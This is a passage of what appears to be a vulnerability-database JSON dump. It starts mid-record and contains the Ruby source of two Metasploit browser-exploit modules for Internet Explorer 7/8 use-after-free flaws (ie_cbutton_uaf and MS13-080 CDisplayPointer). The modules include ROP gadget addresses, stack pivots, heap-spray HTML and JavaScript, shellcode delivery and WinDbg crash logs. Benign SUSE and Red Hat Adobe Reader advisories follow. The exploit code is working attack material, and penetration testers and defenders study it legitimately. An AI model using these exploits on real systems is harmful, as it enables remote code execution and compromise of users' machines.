{'target'=>'2003'})\n end\n else\n rop_payload = generate_rop_payload('java', java_align + code)\n end\n\n rop_payload\n end\n\n def load_exploit_html(my_target, cli)\n\n case my_target['Rop']\n when :msvcrt\n case my_target.name\n when 'IE 8 on Windows XP SP3'\n align_esp = Rex::Text.to_unescape([0x77c4d801].pack(\"V*\")) # ADD ESP, 2C; RET\n xchg_esp = Rex::Text.to_unescape([0x77c15ed5].pack(\"V*\")) # XCHG EAX, ESP, RET\n when 'IE 8 on Windows Server 2003'\n align_esp = Rex::Text.to_unescape([0x77bde7f6].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x77bcba5e].pack(\"V*\"))\n end\n else\n align_esp = Rex::Text.to_unescape([0x7C3445F8].pack(\"V*\"))\n xchg_esp = Rex::Text.to_unescape([0x7C348B05].pack(\"V*\"))\n end\n\n padding = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4))\n js_payload = Rex::Text.to_unescape(get_payload(my_target, cli))\n\n html = %Q|<!doctype html>\n <HTML XMLNS:t =\"urn:schemas-microsoft-com:time\">\n <head>\n <meta>\n <?IMPORT namespace=\"t\" implementation=\"#default#time2\">\n </meta>\n\n <script>\n #{js_mstime_malloc}\n\n\n function helloWorld() {\n e_form = document.getElementById(\"formelm\");\n e_div = document.getElementById(\"divelm\");\n\n for(i =0; i < 20; i++) {\n document.createElement('button');\n }\n e_div.appendChild(document.createElement('button'));\n e_div.firstChild.applyElement(e_form);\n\n e_div.innerHTML = \"\";\n e_div.appendChild(document.createElement('body'));\n\n CollectGarbage();\n\n p = unescape(\"#{padding}\");\n for (i=0; i < 3; i++) {\n p += unescape(\"#{padding}\");\n }\n p += unescape(\"#{js_payload}\");\n\n fo = unescape(\"#{align_esp}\");\n for (i=0; i < 55; i++) {\n if (i == 54) { fo += unescape(\"#{xchg_esp}\"); }\n else { fo += unescape(\"#{align_esp}\"); }\n }\n\n fo += p;\n\n mstime_malloc({shellcode:fo, heapBlockSize:0x58, objId:\"myanim\"});\n }\n </script>\n </head>\n\n <body onload=\"eval(helloWorld())\">\n <t:ANIMATECOLOR id=\"myanim\"/>\n <div id=\"divelm\"></div>\n <form id=\"formelm\">\n </form>\n </body>\n </html>\n |\n\n return html\n end\n\n def on_request_uri(cli, request)\n agent = request.headers['User-Agent']\n uri = request.uri\n print_status(\"Requesting: #{uri}\")\n\n my_target = get_target(agent)\n # Avoid the attack if no suitable target found\n if my_target.nil?\n print_error(\"Browser not supported, sending 404: #{agent}\")\n send_not_found(cli)\n return\n end\n\n html = load_exploit_html(my_target, cli)\n html = html.gsub(/^ {4}/, '')\n print_status(\"Sending HTML...\")\n send_response(cli, html, {'Content-Type'=>'text/html'})\n end\nend\n\n\n=begin\n(87c.f40): Access violation - code c0000005 (first chance)\nFirst chance exceptions are reported before any exception handling.\nThis exception may be expected and handled.\neax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206\nmshtml!CMarkup::OnLoadStatusDone+0x504:\n637848c3 ff90dc000000 call dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????\n0:008> k\nChildEBP RetAddr\n020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504\n020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47\n020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f\n020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12\n020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb\n020bfd78 7e418734 mshtml!GlobalWndProc+0x183\n020bfda4 7e418816 USER32!InternalCallWinProc+0x28\n020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150\n020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306\n020bfe7c 01252ec9 USER32!DispatchMessageW+0xf\n020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461\n020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1\n020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab\n020bffec 00000000 kernel32!BaseThreadStart+0x37\n\n0:008> r\neax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120\neip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0 nv up ei pl nz na po nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010202\nmshtml!CMarkup::OnLoadStatusDone+0x504:\n637848c3 ff90dc000000 call dword ptr [eax+0DCh] ds:0023:0c0c0ce8=????????\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ie_cbutton_uaf.rb"}, {"lastseen": "2020-02-15T05:23:54", "bulletinFamily": "exploit", "description": "This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP, around the same time frame as CVE-2013-3893, except this was kept out of the public eye by multiple research companies and the vendor until the October patch release. This issue is a use-after-free vulnerability in CDisplayPointer via the use of a \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element. If we use a select() function for the CTextArea element, two important things will happen: a CDisplayPointer object will be created for CTextArea, and it will also trigger another event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer object can be forced by using an \"Unselect\" (other approaches also apply), but a reference of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after the CDoc::GetLineInfo call, because it is still trying to use that to update CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash finally occurs due to accessing the freed memory. By controlling this freed memory, it is possible to achieve arbitrary code execution under the context of the user.\n", "modified": "2017-09-09T13:52:08", "published": "2013-10-12T18:01:17", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MS13_080_CDISPLAYPOINTER", "href": "", "type": "metasploit", "title": "MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n include Msf::Exploit::RopDb\n include Msf::Exploit::Remote::BrowserAutopwn\n\n autopwn_info({\n :ua_name => HttpClients::IE,\n :ua_minver => \"8.0\",\n :ua_maxver => \"8.0\",\n :javascript => true,\n :os_name => OperatingSystems::Match::WINDOWS,\n :rank => NormalRanking\n })\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => \"MS13-080 Microsoft Internet Explorer CDisplayPointer Use-After-Free\",\n 'Description' => %q{\n This module exploits a vulnerability found in Microsoft Internet Explorer. It was originally\n found being exploited in the wild targeting Japanese and Korean IE8 users on Windows XP,\n around the same time frame as CVE-2013-3893, except this was kept out of the public eye by\n multiple research companies and the vendor until the October patch release.\n\n This issue is a use-after-free vulnerability in CDisplayPointer via the use of a\n \"onpropertychange\" event handler. To set up the appropriate buggy conditions, we first craft\n the DOM tree in a specific order, where a CBlockElement comes after the CTextArea element.\n If we use a select() function for the CTextArea element, two important things will happen:\n a CDisplayPointer object will be created for CTextArea, and it will also trigger another\n event called \"onselect\". The \"onselect\" event will allow us to set up for the actual event\n handler we want to abuse - the \"onpropertychange\" event. Since the CBlockElement is a child\n of CTextArea, if we do a node swap of CBlockElement in \"onselect\", this will trigger\n \"onpropertychange\". During \"onpropertychange\" event handling, a free of the CDisplayPointer\n object can be forced by using an \"Unselect\" (other approaches also apply), but a reference\n of this freed memory will still be kept by CDoc::ScrollPointerIntoView, specifically after\n the CDoc::GetLineInfo call, because it is still trying to use that to update\n CDisplayPointer's position. When this invalid reference arrives in QIClassID, a crash\n finally occurs due to accessing the freed memory. By controlling this freed memory, it is\n possible to achieve arbitrary code execution under the context of the user.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Exploit in the wild\n 'sinn3r' # Metasploit\n ],\n 'References' =>\n [\n [ 'CVE', '2013-3897' ],\n [ 'OSVDB', '98207' ],\n [ 'MSB', 'MS13-080' ],\n [ 'URL', 'http://blogs.technet.com/b/srd/archive/2013/10/08/ms13-080-addresses-two-vulnerabilities-under-limited-targeted-attacks.aspx' ],\n [ 'URL', 'http://jsunpack.jeek.org/?report=847afb154a4e876d61f93404842d9a1b93a774fb' ]\n ],\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Automatic', {} ],\n [ 'IE 7 on Windows XP SP3', {} ],\n [ 'IE 8 on Windows XP SP3', {} ],\n [ 'IE 8 on Windows 7', {} ],\n ],\n 'Payload' =>\n {\n 'BadChars' => \"\\x00\",\n 'PrependEncoder' => \"\\x81\\xc4\\x0c\\xfe\\xff\\xff\" # add esp, -500\n },\n 'DefaultOptions' =>\n {\n #'PrependMigrate' => true,\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate'\n },\n 'Privileged' => false,\n # Jsunpack first received a sample to analyze on Sep 12 2013.\n # MSFT patched this on Oct 8th.\n 'DisclosureDate' => \"Oct 08 2013\",\n 'DefaultTarget' => 0))\n end\n\n def get_check_html\n %Q|<html>\n<script>\n#{js_base64}\n#{js_os_detect}\n\nfunction os() {\n var detect = window.os_detect.getVersion();\n var os_string = detect.os_name + \" \" + detect.ua_name + \" \" + detect.ua_version;\n return os_string;\n}\n\nfunction dll() {\n var checka = 0;\n var checkb = 0;\n try {\n checka = new ActiveXObject(\"SharePoint.OpenDocuments.4\");\n } catch (e) {}\n\n try {\n checkb = new ActiveXObject(\"SharePoint.OpenDocuments.3\");\n } catch (e) {}\n\n if ((typeof checka) == \"object\" && (typeof checkb) == \"object\") {\n try{location.href='ms-help://'} catch(e){}\n return \"#{@js_office_2010_str}\";\n }\n else if ((typeof checka) == \"number\" && (typeof checkb) == \"object\") {\n try{location.href='ms-help://'} catch(e){}\n return \"#{@js_office_2007_str}\";\n }\n return \"#{@js_default_str}\";\n}\n\nwindow.onload = function() {\n window.location = \"#{get_uri.chomp(\"/\")}/search?o=\" + escape(Base64.encode(os())) + \"&d=\" + dll();\n}\n</script>\n</html>\n |\n end\n\n def junk\n rand_text_alpha(4).unpack(\"V\")[0].to_i\n end\n\n def get_payload(target_info)\n rop_payload = ''\n os = target_info[:os]\n dll_used = ''\n\n case target_info[:dll]\n when @js_office_2007_str\n dll_used = \"Office 2007\"\n\n pivot =\n [\n 0x51c2213f, # xchg eax,esp # popad # add byte ptr [eax],al # retn 4\n junk, # ESI due to POPAD\n junk, # EBP due to POPAD\n junk,\n junk, # EBX due to POPAD\n junk, # EDX due to POPAD\n junk, # ECX due to POPAD\n 0x51c5d0a7, # EAX due to POPAD (must be writable for the add instruction)\n 0x51bd81db, # ROP NOP\n junk # Padding for the retn 4 from the stack pivot\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2007', 'pivot'=>pivot})\n\n when @js_office_2010_str\n dll_used = \"Office 2010\"\n\n pivot =\n [\n 0x51c00e64, # xchg eax, esp; add eax, [eax]; add esp, 10; mov eax,esi; pop esi; pop ebp; retn 4\n junk,\n junk,\n junk,\n junk,\n junk,\n 0x51BE7E9A, # ROP NOP\n junk # Padding for the retn 4 from the stack pivot\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('hxds', payload.encoded, {'target'=>'2010', 'pivot'=>pivot})\n\n when @js_default_str\n if target_info[:os] =~ /windows xp/i\n # XP uses msvcrt.dll\n dll_used = \"msvcrt\"\n\n pivot =\n [\n 0x77C3868A # xchg eax,esp; rcr [ebx-75], 0c1h; pop ebp; ret\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('msvcrt', payload.encoded, {'target'=>'xp', 'pivot'=>pivot})\n else\n # Assuming this is Win 7, and we'll use Java 6 ROP\n dll_used = \"Java\"\n\n pivot =\n [\n 0x7c342643, # xchg eax,esp # pop edi # add byte ptr [eax],al # pop ecx # retn\n junk # Padding for the POP ECX\n ].pack(\"V*\")\n\n rop_payload = generate_rop_payload('java', payload.encoded, {'pivot'=>pivot})\n end\n end\n\n print_status(\"Target uses #{os} with #{dll_used} DLL\")\n\n rop_payload\n end\n\n #\n # IE 6's call is at 6\n # IE 8's call is at 7\n # Don't think this one triggers on IE9\n #\n def get_sploit_html(target_info)\n os = target_info[:os]\n js_payload = ''\n\n if os =~ /Windows (7|XP) MSIE [78]\\.0/\n js_payload = Rex::Text.to_unescape(get_payload(target_info))\n else\n print_error(\"Target not supported by this attack.\")\n return \"\"\n end\n\n %Q|<html>\n<head>\n<script>\n#{js_property_spray}\nsprayHeap({shellcode:unescape(\"#{js_payload}\")});\n\nvar earth = document;\nvar data = \"\";\nfor (i=0; i<17; i++) {\n if (i==6) { data += unescape(\"%u2020%u2030\"); }\n else if (i==7) { data += unescape(\"%u2020%u2030\"); }\n else { data += unescape(\"%u4141%u4141\"); }\n}\ndata += \"\\\\u4141\";\n\nfunction butterfly() {\n for(i=0; i<20; i++) {\n var effect = earth.createElement(\"div\");\n effect.className = data;\n }\n}\n\nfunction kaiju() {\n var godzilla = earth.createElement(\"textarea\");\n var minilla = earth.createElement(\"pre\");\n earth.body.appendChild(godzilla);\n earth.body.appendChild(minilla);\n godzilla.appendChild(minilla);\n\n godzilla.onselect=function(e) {\n minilla.swapNode(earth.createElement(\"div\"));\n }\n\n var battleStation = false;\n var war = new Array();\n godzilla.onpropertychange=function(e) {\n if (battleStation == true) {\n for (i=0; i<50; i++) {\n war.push(earth.createElement(\"span\"));\n }\n }\n\n earth.execCommand(\"Unselect\");\n\n if (battleStation == true) {\n for (i=0; i < war.length; i++) {\n war[i].className = data;\n }\n }\n else {\n battleStation = true;\n }\n }\n\n butterfly();\n godzilla.select();\n}\n</script>\n</head>\n<body onload='kaiju()'>\n</body>\n</html>\n |\n end\n\n\n def on_request_uri(cli, request)\n if request.uri =~ /search\\?o=(.+)\\&d=(.+)$/\n target_info =\n {\n :os => Rex::Text.decode_base64(Rex::Text.uri_decode($1)),\n :dll => Rex::Text.uri_decode($2)\n }\n\n sploit = get_sploit_html(target_info)\n send_response(cli, sploit, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n return\n end\n\n html = get_check_html\n print_status(\"Checking out target...\")\n send_response(cli, html, {'Content-Type'=>'text/html', 'Cache-Control'=>'no-cache'})\n end\n\n def exploit\n @js_office_2007_str = Rex::Text.rand_text_alpha(4)\n @js_office_2010_str = Rex::Text.rand_text_alpha(5)\n @js_default_str = Rex::Text.rand_text_alpha(6)\n super\n end\nend\n\n\n=begin\n\n+hpa this for debugging or you might not see a crash at all :-)\n\n0:005> r\neax=d6091326 ebx=0777efd4 ecx=00000578 edx=000000c8 esi=043bbfd0 edi=043bbf9c\neip=6d6dc123 esp=043bbf7c ebp=043bbfa0 iopl=0 nv up ei pl zr na pe nc\ncs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246\nmshtml!QIClassID+0x30:\n6d6dc123 8b03 mov eax,dword ptr [ebx] ds:0023:0777efd4=????????\n0:005> u\nmshtml!QIClassID+0x30:\n6d6dc123 8b03 mov eax,dword ptr [ebx]\n6d6dc125 8365e800 and dword ptr [ebp-18h],0\n6d6dc129 8d4de8 lea ecx,[ebp-18h]\n6d6dc12c 51 push ecx\n6d6dc12d 6870c16d6d push offset mshtml!IID_IProxyManager (6d6dc170)\n6d6dc132 53 push ebx\n6d6dc133 bf02400080 mov edi,80004002h\n6d6dc138 ff10 call dword ptr [eax]\n\n=end\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/ms13_080_cdisplaypointer.rb"}], "suse": [{"lastseen": "2016-09-04T11:57:19", "bulletinFamily": "unix", "description": "acroread was updated to 9.5.4 to fix remote code execution\n problems. (CVE-2013-0640, CVE-2013-0641)\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.adobe.com/support/security/bulletins/apsb13-07.ht\">http://www.adobe.com/support/security/bulletins/apsb13-07.ht</a>\n ml\n\n", "modified": "2013-02-28T18:26:32", "published": "2013-02-28T18:26:32", "id": "OPENSUSE-SU-2013:0335-2", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00028.html", "title": "acroread to 9.5.4 (critical)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:47:49", "bulletinFamily": "unix", "description": "acroread was updated to 9.5.4 to fix remote code execution\n problems. (CVE-2013-0640, CVE-2013-0641)\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.adobe.com/support/security/bulletins/apsb13-07.ht\">http://www.adobe.com/support/security/bulletins/apsb13-07.ht</a>\n ml\n\n", "modified": "2013-02-25T16:04:25", "published": "2013-02-25T16:04:25", "id": "OPENSUSE-SU-2013:0342-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00023.html", "title": "acroread to 9.5.4 (critical)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:15:18", "bulletinFamily": "unix", "description": "acroread was updated to 9.5.4 to fix remote code execution\n problems. (CVE-2013-0640, CVE-2013-0641)\n\n More information can be found on:\n <a rel=\"nofollow\" href=\"http://www.adobe.com/support/security/bulletins/apsb13-07.ht\">http://www.adobe.com/support/security/bulletins/apsb13-07.ht</a>\n ml\n\n", "modified": "2013-02-25T11:04:27", "published": "2013-02-25T11:04:27", "id": "OPENSUSE-SU-2013:0335-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00021.html", "type": "suse", "title": "acroread to 9.5.4 (critical)", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T11:57:53", "bulletinFamily": "unix", "description": "Acrobat Reader has been updated to 9.5.4 which fixes two\n critical security issues where attackers supplying PDFs\n could have caused code execution with acrobat.\n (CVE-2013-0640, CVE-2013-0641)\n\n More information can be found on:\n\n <a rel=\"nofollow\" href=\"https://www.adobe.com/support/security/bulletins/apsb13-07.h\">https://www.adobe.com/support/security/bulletins/apsb13-07.h</a>\n tml\n &lt;<a rel=\"nofollow\" href=\"https://www.adobe.com/support/security/bulletins/apsb13-07\">https://www.adobe.com/support/security/bulletins/apsb13-07</a>.\n html&gt;\n", "modified": "2013-02-26T18:06:14", "published": "2013-02-26T18:06:14", "id": "SUSE-SU-2013:0349-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2013-02/msg00024.html", "title": "Security update for acroread (important)", "type": "suse", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:08", "bulletinFamily": "unix", "description": "Adobe Reader allows users to view and print documents in Portable Document\nFormat (PDF).\n\nThis update fixes two security flaws in Adobe Reader. These flaws are\ndetailed in the Adobe Security bulletin APSB13-07, listed in the References\nsection. A specially-crafted PDF file could cause Adobe Reader to crash or,\npotentially, execute arbitrary code as the user running Adobe Reader when\nopened. (CVE-2013-0640, CVE-2013-0641)\n\nAll Adobe Reader users should install these updated packages. They contain\nAdobe Reader version 9.5.4, which is not vulnerable to these issues. All\nrunning instances of Adobe Reader must be restarted for the update to take\neffect.\n", "modified": "2018-06-07T09:04:31", "published": "2013-02-21T05:00:00", "id": "RHSA-2013:0551", "href": "https://access.redhat.com/errata/RHSA-2013:0551", "type": "redhat", "title": "(RHSA-2013:0551) Critical: acroread security update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}